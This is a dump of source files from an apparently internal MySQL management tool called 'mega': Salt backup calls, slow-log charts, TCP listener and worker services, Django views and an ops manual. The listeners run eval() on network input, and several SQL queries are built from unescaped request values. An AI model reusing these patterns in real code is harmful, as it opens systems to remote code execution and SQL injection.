salt.client.LocalClient()\n #res = client.cmd(ip, 'cmd.run',[command],timeout=86400,expr_form='list')\n #res = client.cmd(ip, 'cmd.script',[command],kwarg=args,timeout=86400,expr_form='list')\n res = client.cmd_async(ip, 'cmd.script',[command],timeout=86400,expr_form='list')\n return res\n\ndef backup_salt_client(args):\n ''''''\n feadback = {}\n ip_list = [ip[\"host_ip\"] for ip in args]\n for ips in ip_list:\n result = saltcmdrun(ips,'salt:\\\\mega_db_backup.py',args)\n feadback[ips] = result\n return feadback\n\n\nif __name__ == \"__main__\":\n#*# if len(sys.argv) !=1:\n#*# print \"USAGE:\\n\", USAGE.strip(\"\\n\")\n#*# sys.exit(0)\n#*# args = sys.argv\n args =[ {'id' : 1,\n 'host_ip' : '172.17.62.37',\n 'port' : 3309,\n 'db_type' : 'mysql',\n 'backup_tool' : 'xtrabackup',\n 'backup_level': 'instance',\n 'level_value' : '',\n 'backup_type' : 'full',\n 'need_data' : 'Y',\n 'need_schema' : 'Y',\n 'Iscompressed': 'Y',\n 'isEncrypted' : 'Y',\n 'retention' : '7',\n },\n {'id' : 1,\n 'host_ip' : '172.17.62.38',\n 'port' : 3309,\n 'db_type' : 'mysql',\n 'backup_tool' : 'xtrabackup',\n 'backup_level': 'instance',\n 'level_value' : '',\n 'backup_type' : 'full',\n 'need_data' : 'Y',\n 'need_schema' : 'Y',\n 'Iscompressed': 'Y',\n 'isEncrypted' : 'Y',\n 'retention' : '7',\n }\n ]\n res = backup_salt_client(args)\n print json.dumps(res, indent = 4, sort_keys=True)\n \n" }, { "alpha_fraction": 0.6502732038497925, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 21.875, "blob_id": "97476a1eb0e82824c67688aabefa59b68abf5eb1", "content_id": "63b247ca8dab7120f8422d2d09cc2ad3256dbe92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 183, "license_type": "no_license", "max_line_length": 31, "num_lines": 8, "path": "/src/tests/test.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import os,sys\nd=os.path.dirname(sys.path[0])\nt=os.path.basename(sys.path[0])\na=os.path.abspath(sys.path[0])\nprint a\nos.chdir('/'.join((d,t)))\n#for l in open('slow_log.py'):\n#\tprint l\n" }, { "alpha_fraction": 0.8217270374298096, "alphanum_fraction": 0.8217270374298096, "avg_line_length": 39, "blob_id": "48b65374a49b93978b332a95fb216fb7ebcd9157", "content_id": "30f7aac1cfc6d0342509c6dd3c85070ee0a84a91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 359, "license_type": "no_license", "max_line_length": 74, "num_lines": 9, "path": "/src/apis/api.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "from resource import * \nfrom manage import *\nfrom task import * \nfrom tools import * \nfrom report import *\nfrom mega_web.console.failover import FailoverManage\nadd_failover_record=FailoverManage(None).add_failover_record\nadd_failover_record_detail=FailoverManage(None).add_failover_record_detail\nstat_failover_record=FailoverManage(None).stat_failover_record" }, { "alpha_fraction": 0.6274446845054626, "alphanum_fraction": 0.6327348351478577, "avg_line_length": 37.51234436035156, "blob_id": "5034ede154aa3e665a162fc614ab64cecb206c45", "content_id": "ee856ecd023c0dbeeef852b7c18bfd3faa899375", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6238, "license_type": "no_license", "max_line_length": 186, "num_lines": 162, "path": "/src/mega_web/tunning/slowlog.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Aug 19, 2014\n\n@author: xchliu\n\n@module:mega_web.tunning.slowlog\n'''\nfrom lib.PyMysql import PyMySQL\nfrom mega_web.charts.chart import Chart\nfrom lib.utils import today\n\n\ncursor=PyMySQL()\n \n\ndef get_chart_groupbyinstance(begin=None,end=None):\n #default recent 7 days\n if not begin or not end:\n begin=today(7)\n end=today()\n sql=''' select concat(ip,':',port),sum(counts) as counts from slowlog_time_day a,instance b where a.instance_id=b.id and \n date(log_time) between '%s' and '%s' group by instance_id order by counts desc limit 10;''' % (begin,end)\n data=cursor.query(sql).fetchall()\n c=Chart()\n c.type='column'\n c.yaxis_name='counts'\n c.data_list=[\"counts\",]\n return c.generate(data, 'slow log by instance') \n\ndef get_chart_total(instance_id=None,begin=None,end=None):\n if not begin or not end:\n begin=today(7)\n end=today()\n if instance_id:\n sql=\"select day(log_time) as day,sum(counts) as counts from slowlog_time_day where instance_id=%s and date(log_time) between '%s' and '%s' \\\n group by date(log_time);\" % (instance_id,begin,end) \n else:\n sql=\"select day(log_time) as day,sum(counts) as counts from slowlog_time_day where date(log_time) between '%s' and '%s' \\\n group by date(log_time);\" % (begin,end)\n cursor=PyMySQL().query(sql)\n data=cursor.fetchall()\n c=Chart()\n c.yaxis_name='counts'\n c.data_list=[\"counts\",]\n return c.generate(data, '')\n\ndef get_chart_groupbytime(begin=None,end=None):\n if not begin or not end:\n begin=today(7)\n end=today()\n \n sql='''select date(log_time) as day,sum(lt_one) as lt_one,sum(lt_five) as lt_five,sum(lt_ten) as lt_ten,sum(lt_hundred) as \\\n lt_hundred,sum(gt_hundred) as gt_hundred from slowlog_time_day\n where date(log_time) between '%s' and '%s' group by hour(log_time);''' % (begin,end)\n data=cursor.query(sql).fetchall()\n c=Chart()\n c.type='pie'\n c.yaxis_name='counts'\n c.data_list=[\"<1s\",\"<5s\",\"<10s\",\"<100s\",\">100s\"]\n return c.generate(data, 'slow log by time') \n\ndef get_chart_topsql(begin=None,end=None):\n if not begin or not end:\n begin=today(7)\n end=today() \n sql=\"select b.hash_code,b.sql_parsed,sum(counts) as counts,max_time,min_time,avg(avg_time) as avg_time,max_row,min_row,avg(avg_row) as avg_row from slowlog_sql_hour a ,sql_format b \\\n where a.hash_code=b.hash_code and date(log_time) between '%s' and '%s' group by a.hash_code order by counts desc limit 100 ;\" % (begin,end)\n \n data=cursor.query(sql,type='dict').fetchall()\n for d in data:\n d['sql_parsed']=d['sql_parsed'].decode('utf-8', 'ignore')\n opt_count=0\n sql=\"select count(*) from slowlog_opt where hash_code='%s'\" % d.get('hash_code')\n opt_count=cursor.fetchOne(sql)\n if opt_count:\n d['opt_count']=opt_count\n return data\n\ndef get_instance_topsql(instance_id,begin=None,end=None):\n if not begin or not end:\n begin=today(7)\n end=today()\n \n sql=\"select a.hash_code,b.sql_parsed,count(*) as counts,max(query_time) as max_time,min(query_time) as min_time,avg(query_time) as avg_time,\\\n max(rows_examined) as max_row,min(rows_examined) as min_row,avg(rows_examined) as avg_row from slowlog_info a ,sql_format b where instance_id=%s \\\n and a.hash_code=b.hash_code and date(from_unixtime(a.start_time)) between '%s' and '%s' group by a.hash_code order by counts desc;\" %(instance_id,begin,end)\n print sql\n data=cursor.query(sql,type='dict').fetchall()\n for d in data:\n d['sql_parsed']=d['sql_parsed'].decode('utf-8', 'ignore')\n return data\n\n\ndef get_sql_hosts(hash_code):\n sql=\"select concat(user,'@',user_host) as users,count(*) as counts from slowlog_info where hash_code='%s' group by user,user_host order by counts desc;\" % hash_code\n data=cursor.query(sql).fetchall()\n c=Chart()\n c.type='column'\n c.yaxis_name='counts'\n c.data_list=[\"counts\",]\n return c.generate(data, ' by instance') \n\ndef get_sql_time(hash_code):\n sql=\"select date(log_time) as log_time,count(*) as counts from slowlog_sql_hour where hash_code='%s' group by date(log_time) order by date(log_time);\" % hash_code\n data=cursor.query(sql).fetchall()\n c=Chart()\n c.yaxis_name='counts'\n c.data_list=[\"counts\",]\n return c.generate(data, '')\n\ndef get_sql_info(hash_code):\n sql=\"select hash_code,db_host,port,dbname,sql_text,sql_explained from slowlog_info where hash_code='%s' limit 1\" %hash_code\n data=cursor.query(sql,type='dict').fetchone()\n return data\n\ndef add_opt_record(request):\n hash_code=request.get('hash_code')\n opt_method=request.get('opt_method')\n opt_explain=request.get('opt_explain')\n if not hash_code:\n return 'Get sql hash code failed!' \n if not opt_method:\n return 'Invalid optimize method'\n sql=\"insert into slowlog_opt(hash_code,opt_method,opt_explain,opt_time) values('%s','%s','%s',now())\" %(hash_code,opt_method,opt_explain)\n result,ex=cursor.execute(sql)\n if not result:\n result=ex\n else:\n result='Success '\n return result\n\ndef get_opt_record(hash_code):\n if not hash_code:\n return \n sql=\"select * from slowlog_opt where hash_code='%s'\" % hash_code\n data=cursor.query(sql,type='dict').fetchall()\n return data\n\ndef get_chart_groupbydb(instance_id=None,begin=None,end=None):\n if not begin or not end:\n begin=today(7)\n end=today()\n if instance_id:\n sql='''select db,sum(counts) as counts from slowlog_time_day where instance_id=%s and date(log_time) between '%s' and '%s' group by db order by counts desc ;\n ''' % (instance_id,begin,end)\n else:\n sql='''select db,sum(counts) as counts from slowlog_time_day where date(log_time) between '%s' and '%s' group by db order by counts desc ;\n ''' % (begin,end)\n \n data=cursor.query(sql).fetchall()\n c=Chart()\n c.type='column'\n c.yaxis_name='counts'\n c.data_list=[\"counts\"]\n return c.generate(data, 'by db') \n\n \ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.5668147206306458, "alphanum_fraction": 0.5728704333305359, "avg_line_length": 25.645160675048828, "blob_id": "b1b195ed1af6d7e31dae8ced2a957940d7a571c1", "content_id": "3d22b589e05a34697cab40c79795195006891ed1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2477, "license_type": "no_license", "max_line_length": 70, "num_lines": 93, "path": "/src/mega_client/mega-1.0/mega_client/listener.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding: UTF-8 -*-\nimport time\nimport sys\nimport SocketServer\nimport signal\nfrom SocketServer import StreamRequestHandler as SRH\nfrom setting import TCP_HOST,TCP_PORT\nfrom logs import Logger\nfrom worker import Worker\n\nEND_SIGN='eof'.upper()\nERROR='-1'\nSUCCESS='0'\nTCP_HEADER=['HEAD','MEGA']\nBUFFER_SIZE=10\nHEADER_LENGTH=10\n\nMODEL='Listener'\nlog = Logger(MODEL).log()\n \nSocketServer.ThreadingTCPServer.allow_reuse_address = True\n\nclass Servers(SRH):\n \n def handle(self):\n log.debug('Get connection from %s' % str(self.client_address))\n global q\n result=''\n data=''\n header=''\n header=int(self.request.recv(HEADER_LENGTH))\n while header>0:\n _d= self.request.recv(BUFFER_SIZE)\n data+=_d\n if _d.find(END_SIGN) > 0:\n break\n header=header-BUFFER_SIZE\n# print header,_d\n data=data.replace(END_SIGN, '')\n log.debug(data)\n if self.data_check(data):\n _w=Worker(data).run()\n result=str(_w)\n else:\n result=ERROR\n#todo : \n# get the len(result),add the length to the head of packget, \n# chancel the end sign\n _len=len(result)+HEADER_LENGTH\n _header=str(_len)\n for i in range(HEADER_LENGTH - len(str(_len))):\n _header='0'+_header\n self.request.sendall(_header+result+END_SIGN)\n self.request.close()\n \n def data_check(self,data):\n if len(data) == 0:\n return False\n try:\n if eval(data).get(TCP_HEADER[0]).upper() != TCP_HEADER[1]:\n return False\n except:\n return False\n \n return True\n \ndef tcp_server(host=TCP_HOST,port=TCP_PORT):\n \n def sign_killed(signum,frame):\n server.server_close()\n log.info(\"TCP server quiting...\")\n sys.exit(0)\n\n addr = (host,port)\n log.info('TCP Server listen on %s ...' % str(addr))\n server=None\n signal.signal(signal.SIGINT, sign_killed)\n signal.signal(signal.SIGTERM, sign_killed)\n try:\n server = SocketServer.ThreadingTCPServer(addr,Servers)\n server.daemon_threads=True\n server.serve_forever()\n \n except Exception as ex:\n log.error('TCP server start failed as: %s',ex)\n sys.exit(1)\n finally:\n if server:\n server.shutdown()\n server.server_close()\n \nif __name__==\"__main__\":\n tcp_server()" }, { "alpha_fraction": 0.6356589198112488, "alphanum_fraction": 0.6385148763656616, "avg_line_length": 30.84415626525879, "blob_id": "f0a34f566632464d20227d67d4b8c704ee65739c", "content_id": "1d2d40848f7892c42086020d6855d4e335f1dcd7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2451, "license_type": "no_license", "max_line_length": 132, "num_lines": 77, "path": "/src/mega_web/admin/views.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Aug 7, 2014\n\n@author: xchliu\n\n@module:mega_web.admin.views\n'''\nfrom django.contrib import auth\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render_to_response,RequestContext\n\nfrom client_manage import ClientGet\nfrom mega_web.lib import paginator\nfrom mega_service.mega import client_update\n\n@login_required\ndef mega_admin(request):\n if request.method==\"GET\":\n return render_to_response('admin_mega/admin.html',context_instance=RequestContext(request))\n else:\n return render_to_response('admin_mega/admin.html',context_instance=RequestContext(request))\n \ndef client(request):\n _msg=''\n client_list=ClientGet().get_client_list()\n if request.method==\"GET\":\n page=request.GET.get('page')\n action = request.GET.get('action')\n host=request.GET.get('ip')\n if action == 'client_upgrade' and host:\n result=client_update(host)\n if result:\n _msg='success'\n else:\n _msg='failure'\n else:\n page=request.POST.get('page')\n if not page:\n page=1\n page_data=paginator.paginator(client_list, page)\n page_range=page_data.get('page_range')\n client_list=page_data.get('page_data')\n count=ClientGet().get_client_statics()\n return render_to_response('admin_mega/client.html',{'client_list':client_list,'page_range':page_range,'count':count,'msg':_msg},\n context_instance=RequestContext(request))\n\ndef login(request):\n next='/login/'\n if request.method == 'GET':\n next = request.GET.get('next','')\n return render_to_response('admin_mega/login.html',{'next':next},RequestContext(request))\n else:\n \n username = request.POST.get('username', '')\n password = request.POST.get('password', '')\n next = request.POST.get('next','')\n user = auth.authenticate(username=username, password=password)\n if user is not None and user.is_active:\n auth.login(request, user)\n if not next:\n next='/'\n return HttpResponseRedirect(next) \n\n#@login_required\ndef logout(request):\n auth.logout(request)\n return HttpResponseRedirect(\"/\") \n# return render_to_response('home.html', RequestContext(request))\n\n\ndef main():\n return\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.4516821801662445, "alphanum_fraction": 0.45991408824920654, "avg_line_length": 30.016666412353516, "blob_id": "379e2912c1cd0732476044585a80170823159bfd", "content_id": "4b8a8822cdf207cc2adddde65e36c7f3844f56e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5588, "license_type": "no_license", "max_line_length": 129, "num_lines": 180, "path": "/src/mega_service/worker.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import time\nimport types\nimport inspect\nimport multiprocessing\nfrom lib.logs import Logger\nfrom apis import api as apis\n\nMODEL='Worker'\nlog = Logger(MODEL).log()\nPOOL_SIZE=5\n\n\n#===============================================================================\n# _get_func_list\n#===============================================================================\ndef _get_func_list(object):\n _funcs=[]\n if not object:\n return _funcs \n for o in dir(object):\n obj_func=getattr(object,o,None)\n if inspect.isfunction(obj_func):\n _funcs.append({\"name\":\"%s\" % obj_func.__name__,\"args\":\"%s\" % str(inspect.getargspec(obj_func))}) \n return _funcs \n\nclass Worker():\n '''\n 1.Try to get the taks in the quene \n 2.create a sub process to do the work if any task been found \n '''\n def __init__(self,queue):\n self.queue=queue \n \n def worker(self):\n pool= multiprocessing.Pool(POOL_SIZE)\n while 1:\n data=None \n try:\n # log.debug('loop')\n if not self.queue.empty():\n data=self.queue.get()\n if data:\n log.debug(data)\n pool.apply_async(work_deliver,args=(data,))\n time.sleep(1)\n except Exception as ex:\n log.error(ex)\n \n\nclass SubWorker(): \n def __init__(self):\n pass\n \n def work_resolve(self,data):\n '''\n work instance:{'HEAD':'MEGA','TYPE':'CMD','VALUE':'ls'}\n keys:\n * HEAD: for safe interactive,should be MEGA\n * TYPE: 0 internal server task,1 remote task\n * VALUE: what to do : ls\n * TIME: when to do : 0 once , relay to the CYCLE\n CYCLE: lifecycle of job day,week,month\n TARGET: unique identify for server or instance or database.\n TOOL: Internal func calls\n _item=['TYPE','TIME','VALUE','CYCLE','TARGET','ARGS']\n \n '''\n if len(data)==0:\n return False\n d=None\n try :\n if type(data) == types.DictionaryType:\n d=data\n else:\n d=eval(data) \n if type(d)== types.DictionaryType:\n if not (d.has_key('TYPE') or d.has_key('VALUE')):\n return False\n else:\n for _d in d:\n if type(d[_d]) == types.StringType:\n d[_d].replace('\\n','')\n ' '.join(d[_d].split())\n else:\n return False\n except Exception as ex:\n log.error(\"Resolve the data failed as : %s\" % ex)\n log.error(data)\n return False\n \n return d\n \ndef work_deliver(data):\n '''\n 1.run the command\n 2.save task into db\n '''\n task=SubWorker().work_resolve(data)\n if not task:\n log.error(\"Task resovle failed!\")\n return False\n #internal funcs invoke,the task should include key : TOOL True\n if task.has_key('TOOL'):\n if task.get('VALUE')=='get_all_funcs':\n return _get_func_list(apis)\n\n #real time job \n if task.get('TIME') == 0 :\n #execute on mega server or the remote instance\n if task.get('TYPE')==0:\n result=Executor_Local(task.get('VALUE')).do_cmd(task.get('ARGS'))\n else:\n result=Executor_remote(task).run()\n else:\n #save into db\n result=1\n return result\n \n \nclass Executor_remote():\n '''\n Run the task on the remote server using the mega client tcp service\n {'NAME': u'test', 'TASK_ID': 9L, 'SCRIPT': u'test.sh', 'ARGS': \"'17:24'\", 'VALUE': u'',\n 'TIME': 0, 'CYCLE': 120L, 'TYPE': 1L, 'LAST_TIME': u'2014-08-04 17:22:19', 'TARGET': u''}\n \n '''\n def __init__(self,task):\n self.task=task\n def run(self):\n hosts=self.task.get('TARGET')\n if not hosts:\n hosts=['localhost']\n cmd=self.task.get('SCRIPT')\n _cmd=cmd.split('.')\n if len(_cmd)>1:\n if _cmd[1]=='py':\n cmd_type='python'\n elif _cmd[1] == 'sh' :\n cmd_type='bash'\n elif _cmd[1] == 'pl':\n cmd_type='perl'\n else:\n cmd_type='cmd'\n args=self.task.get('ARGS')\n task_id=self.task.get('TASK_ID')\n if not task_id:\n task_id=None\n for ip in hosts:\n log.info('Call remote task @ %s : %s %s' % (ip,cmd,args)) \n apis.remote_cmd(ip,1105, cmd, cmd_type, task_id,args)\n \n\n \nclass Executor_Local():\n '''\n request of mega server ,invoke func inside mega server\n '''\n def __init__(self,cmd):\n self.cmd=cmd\n def do_cmd(self,_args=None):\n func=getattr(apis,self.cmd,None)\n if func:\n log.debug(\"Call API: apis.%s(%s)\" % (self.cmd,_args))\n# return func(arg for arg in _args)\n return eval(\"apis.%s(%s)\" % (self.cmd,_args))\n \n else:\n log.error(\"Function %s not found\" % self.cmd)\n return False\n\n\nclass Saver():\n '''\n save task into database if it need to be rerun \n '''\n def __init__(self):\n pass\n def run(self):\n log.debug('saver')\n pass\n \n" }, { "alpha_fraction": 0.46568727493286133, "alphanum_fraction": 0.4739384055137634, "avg_line_length": 26.915729522705078, "blob_id": "b501102c01b216c4b992719e0864f064f742a2e6", "content_id": "4761ab849cf9aee42c9bbb549ebfb477d06b0db5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4969, "license_type": "no_license", "max_line_length": 88, "num_lines": 178, "path": "/src/mega_client/mega_client/sender.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding: UTF-8 -*-\n'''\nCreated on Jul 1, 2014\n\n@author: xchliu\n\n'''\n\nimport types\nimport socket\n\n\n\nTCP_HEADER={'HEAD':'MEGA'}\nEND_SIGN='eof'.upper()\nBUFFER_SIZE=10\nDEFAULT_NONE=0\nHEADER_LENGTH=10\n\n\nclass MegaClient():\n '''\n Client for mega servcie .\n return a list d:\n * if all runs success ,the list contain all the data required\n * else only a 0 in the list means something goes into failure\n code example: \n cmd='get_all_instance'\n c=MegaClient(cmd=cmd)\n if c:\n data=c.run(func_args=\"model='backup',stat=1,role=1\",CYCLE=1)\n c.close()\n return data\n '''\n HOST='localhost'\n PORT=1104\n def __init__(self,host=HOST,port=PORT,cmd=''):\n self._cmd={}\n self.host=host\n self.port=port\n socket.setdefaulttimeout(10)\n if cmd:\n self._cmd['VALUE']=str(cmd)\n \n def run(self,func_args=None,**args):\n if not self._cmd:\n return False\n _d=[]\n if self.conn():\n if func_args:\n self._cmd['ARGS']=str(func_args)\n if len(args)>0:\n self._cmd=dict(self._cmd,**args) \n _d.append(1)\n _d.append(self.cmd_run(self._cmd))\n else:\n _d.append(0)\n if _d[0] == 1:\n return _d[1]\n else:\n return _d[0]\n \n def conn(self):\n try: \n self.s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) \n self.s.connect((self.host,self.port))\n return True\n except Exception as ex:\n# log.error(\"Connect to host : %s failed! %s\" % (self.host,ex))\n return False\n \n def cmd_run(self,cmd=None):\n if not cmd:\n return False\n data=''\n _header=''\n try:\n cmd_with_pack=self._cmd_pack(cmd)\n if cmd_with_pack:\n _len=len(str(cmd_with_pack))+HEADER_LENGTH\n _header=str(_len)\n for i in range(HEADER_LENGTH - len(str(_len))):\n _header='0'+_header\n self.s.sendall(_header+str(cmd_with_pack)+END_SIGN)\n header=int(self.s.recv(HEADER_LENGTH))\n while header>0:\n _d=self.s.recv(BUFFER_SIZE)\n data+=_d\n if _d.find(END_SIGN) > 0:\n break\n header=header-HEADER_LENGTH\n return self._data_unpack(data)\n except Exception as ex:\n# log.error(ex)\n return ''\n \n def _cmd_pack(self,data):\n '''\n keys:\n * TYPE: 0 internal server task,1 remote task\n * VALUE: func name which be called\n * TIME: when to do : 0 once , relay to the CYCLE\n CYCLE: lifecycle of job day,week,month\n TARGET: unique identify for server or instance or database. \n unique command type when in the case used for remote command etc.\n *cmd\n *python\n *bash\n ARGS: args for the api func\n TOOL: Internal func calls\n '''\n _d=None\n if type(data) == types.DictionaryType:\n _d=dict(TCP_HEADER,**data)\n elif type(data) == types.StringType:\n _d=dict(TCP_HEADER,**eval(data))\n else:\n _d={}\n _item=['TYPE','TIME','VALUE','CYCLE','TARGET','ARGS']\n for _i in _item:\n if not _d.get(_i):\n _d[_i]=DEFAULT_NONE \n return _d\n \n def _data_unpack(self,data):\n if not data:\n return ''\n return data.replace(END_SIGN,'')\n \n def close(self):\n self.s.close() \n\n\nclass MegaTool():\n\n def __init__(self):\n pass\n\n def get_all_funcs(self):\n cmd='get_all_funcs'\n self.c=MegaClient(cmd=cmd)\n func_list=self.c.run(TOOL=True)\n if func_list:\n i=1\n for f in eval(func_list):\n print i,f['name'],f['args']\n i+=1\n self.close()\n \n def close(self):\n self.c.close\n\ndef get_help():\n print 'usage:'\n print 'python sender.py [help] -get this doc'\n print 'python sender.py list -get all the supported fucntion and description'\n print MegaClient().__doc__\n \n\nif __name__==\"__main__\":\n import sys\n cmd=''\n if len(sys.argv)>1:\n cmd=sys.argv[1]\n if cmd.upper()=='LIST':\n t=MegaTool()\n t.get_all_funcs()\n#for test\n elif cmd.upper() == 'HELP' or '-H':\n get_help()\n else:\n cmd='get_all_instance'\n c=MegaClient(cmd=cmd)\n if c:\n print c.run(func_args=\"model='backup',stat=1,role=1\",CYCLE=1)\n c.close()\n else:\n get_help()\n" }, { "alpha_fraction": 0.570644736289978, "alphanum_fraction": 0.5770461559295654, "avg_line_length": 26.350000381469727, "blob_id": "482e48dfbbca9b54fb38f2fff945d5fca52cd32d", "content_id": "c01b093813e020eb43861e6edbaa7efa94a0f6e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2187, "license_type": "no_license", "max_line_length": 70, "num_lines": 80, "path": "/src/mega_service/listener.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding: UTF-8 -*-\nimport sys\nsys.path.append('..')\nimport socket\nimport multiprocessing \nimport SocketServer\nfrom SocketServer import StreamRequestHandler as SRH\nfrom conf.GlobalConf import DEFAULT_TCP_PORT,DEFAULT_TCP_HOST,DEBUG\nfrom lib.logs import Logger\nfrom worker import work_deliver\n\nEND_SIGN='EOF'\nERROR='-1'\nSUCCESS='0'\nTCP_HEADER=['HEAD','MEGA']\nBUFFER_SIZE=10\nHEADER_LENGTH=10\n\nMODEL='Listener'\nlog = Logger(MODEL).log()\n \nclass Servers(SRH):\n def handle(self):\n log.debug('Get connection from %s' % str(self.client_address))\n global q\n result=''\n data=''\n header=''\n \n header=int(self.request.recv(HEADER_LENGTH))\n while header>0:\n _d= self.request.recv(BUFFER_SIZE)\n data+=_d\n if _d.find(END_SIGN) > 0:\n break\n header=header-BUFFER_SIZE\n# print header,_d\n data=data.replace('EOF', '')\n log.debug(data)\n if self.data_check(data):\n _w=work_deliver(data)\n result=str(_w)\n else:\n result=ERROR\n #log.debug(result)\n#todo : \n# get the len(result),add the length to the head of packget, \n# chancel the end sign\n _len=len(result)+HEADER_LENGTH\n _header=str(_len)\n for i in range(HEADER_LENGTH - len(str(_len))):\n _header='0'+_header\n self.request.sendall(_header+result+END_SIGN)\n \n def data_check(self,data):\n if len(data) == 0:\n return False\n try:\n if eval(data).get(TCP_HEADER[0]).upper() != TCP_HEADER[1]:\n return False\n except:\n log.error('Invilid TCP header of packege!')\n return False\n return True\n \ndef tcp_server(queue,host=DEFAULT_TCP_HOST,port=DEFAULT_TCP_PORT):\n global q\n q=queue\n addr = (host,port)\n log.info('TCP Server listen on %s' % str(addr))\n try: \n server = SocketServer.ThreadingTCPServer(addr,Servers)\n server.serve_forever()\n except Exception as ex:\n log.error('TCP server start failed as: %s',ex)\n sys.exit(1)\n\n\nif __name__==\"__main__\":\n tcp_server()" }, { "alpha_fraction": 0.5291399955749512, "alphanum_fraction": 0.6648898124694824, "avg_line_length": 37.53424835205078, "blob_id": "4c93dd7a33c29cc7a510b23075c1f5c42c1478e8", "content_id": "5ebf0f02b31396b612f5695183e12031d2d0488c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2926, "license_type": "no_license", "max_line_length": 118, "num_lines": 73, "path": "/docs/mega_op.md", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#Mega 运维手册\n\n##Mega Web \n* 启动\n\t\n\t\tuwsgi --yaml /export/servers/app/mega/src/wsgi.yaml\n\t\n* 配置文件:\n\n\t\t$cat wsgi.yaml\n\t\tuwsgi:\n\t\t\thttp: 0.0.0.0:8080\n\t \t\tchdir: /export/servers/app/mega/src\n \t\t\tmodule: django_wsgi\n \t\t\tprocesses: 2\n\t \t\tdaemonize: /tmp/uwsgi.log\n \t\t\tpidfile: /tmp/uwsgi.pid\n\n* 正常启动日志:\n\t\t\n\t\t*** Starting uWSGI 2.0.7 (64bit) on [Mon Sep 22 17:49:17 2014] ***\n\t\tcompiled with version: 4.4.7 20120313 (Red Hat 4.4.7-3) on 22 September 2014 16:19:56\n\t\tos: Linux-2.6.32-358.el6.x86_64 #1 SMP Fri Feb 22 00:31:26 UTC 2013\n\t\tnodename: MYSQL-YZH-6237\n\t\tmachine: x86_64\n\t\tclock source: unix\n\t\tdetected number of CPU cores: 24\n\t\tcurrent working directory: /export/servers/app/mega/src\n\t\twriting pidfile to /tmp/uwsgi.pid\n\t\tdetected binary path: /usr/bin/uwsgi\n\t\t!!! no internal routing support, rebuild with pcre support !!!\n\t\t*** WARNING: you are running uWSGI without its master process manager ***\n\t\tyour processes number limit is 64000\n\t\tyour memory page size is 4096 bytes\n\t\tdetected max file descriptor number: 65535\n\t\tlock engine: pthread robust mutexes\n\t\tthunder lock: disabled (you can enable it with --thunder-lock)\n\t\tuWSGI http bound on 0.0.0.0:8080 fd 4\n\t\tspawned uWSGI http 1 (pid: 28736)\n\t\tuwsgi socket 0 bound to TCP address 127.0.0.1:17925 (port auto-assigned) fd 3\n\t\tPython version: 2.6.6 (r266:84292, Feb 22 2013, 00:00:18) [GCC 4.4.7 20120313 (Red Hat \t\t4.4.7-3)]\n\t\t*** Python threads support is disabled. You can enable it with --enable-threads ***\n\t\tPython main interpreter initialized at 0x2677bf0\n\t\tyour server socket listen backlog is limited to 100 connections\n\t\tyour mercy for graceful operations on workers is 60 seconds\n\t\tmapped 145536 bytes (142 KB) for 2 cores\n\t\t*** Operational MODE: preforking ***\n\t\tWSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x2677bf0 pid: 28735 \t\t(default app)\n\t\t*** uWSGI is running in multiple interpreter mode ***\n\t\tspawned uWSGI worker 1 (pid: 28735, cores: 1)\n\t\tspawned uWSGI worker 2 (pid: 28737, cores: 1)\n* 运行状态\n\n\t\t线程状态:\n\t\t[3-MySQL-Inst@MYSQL-YZH-6237 ~]\n\t\t$ps aux |grep wsgi\n\t\txdba 28735 0.0 0.0 314472 27380 ? S 17:49 0:00 uwsgi --yaml /export/servers/app/mega/src/wsgi.yaml\n\t\txdba 28736 0.0 0.0 51420 1744 ? S 17:49 0:00 uwsgi --yaml /export/servers/app/mega/src/wsgi.yaml\n\t\txdba 28737 0.0 0.0 314576 26300 ? S 17:49 0:00 uwsgi --yaml /export/servers/app/mega/src/wsgi.yaml\n\t\txdba 33624 0.0 0.0 143720 4032 pts/16 S+ 18:01 0:00 vim uwsgi.log\n\t\troot 35483 0.0 0.0 103244 852 pts/5 S+ 18:06 0:00 grep wsgi\n\n\t\t网络监听:\n\t\t[3-MySQL-Inst@MYSQL-YZH-6237 ~]\n\t\t$netstat -lnpt |grep 8080\n\t\ttcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 28735/uwsgi\n\t\t\n* 关闭\n \n\t uwsgi --stop /tmp/uwsgi.pid\n 执行后检查进程状态,确认关闭。\n* 重启\n 关闭后启动\n\n" }, { "alpha_fraction": 0.48400452733039856, "alphanum_fraction": 0.4960481822490692, "avg_line_length": 26.6875, "blob_id": "cc883e483e212a73c0fbf4b5154febb17c55496f", "content_id": "e7c982a67c0aed12d016bf5c93e4ec75bacf6d87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2657, "license_type": "no_license", "max_line_length": 110, 